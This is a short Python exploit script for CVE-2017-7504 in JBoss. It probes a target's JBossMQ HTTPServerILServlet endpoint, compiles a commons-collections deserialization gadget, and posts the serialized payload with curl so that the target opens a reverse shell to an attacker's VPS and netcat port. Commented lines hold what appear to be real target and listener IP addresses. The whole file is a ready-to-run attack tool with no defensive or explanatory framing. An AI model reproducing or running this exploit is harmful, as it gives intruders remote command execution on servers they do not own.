#!python3
# -*- encoding: utf-8 -*-
'''
@File    :   CVE-2017-7504.py
@Time    :   2023/04/07 14:14:11
@Author  :   mingy
@Version :   1.0
@Desc    :   None
'''

import os
import time
import requests

print(">>> Set target url <<<")
host = input(">>> ")
# host = "http://122.114.225.18:4002"
uri = "/jbossmq-httpil/HTTPServerILServlet"
url = f"{host}{uri}"

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36",
    "Content-Type": "application/x-www-form-urlencoded"
}

def check():
    res = requests.get(url, headers=headers, verify=False)
    if res.status_code != 200 or "JBossMQ" not in res.content.decode():
        return 0
    print(f"{host}, have CVE-2017-7504 vuln !!!")
    return 1


def getshell(ip, port):
    os.system('javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java')
    time.sleep(3)
    os.system(f'java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap {ip}:{port}')
    time.sleep(3)
    os.system(f'curl {url} --data-binary @ReverseShellCommonsCollectionsHashMap.ser')
    print(">>> Sent massage sucess !!! <<<")


if __name__ == '__main__' and check():
    # vps_ip = "124.71.45.28"
    # vps_port = "6666"
    print(">>> Set vps_ip <<<")
    vps_ip = input(">>> ")
    print(">>> Set nc_port <<<")
    nc_port = input(">>> ")
    getshell(vps_ip, nc_port)
    print(">>> Getshell Success !!! <<<")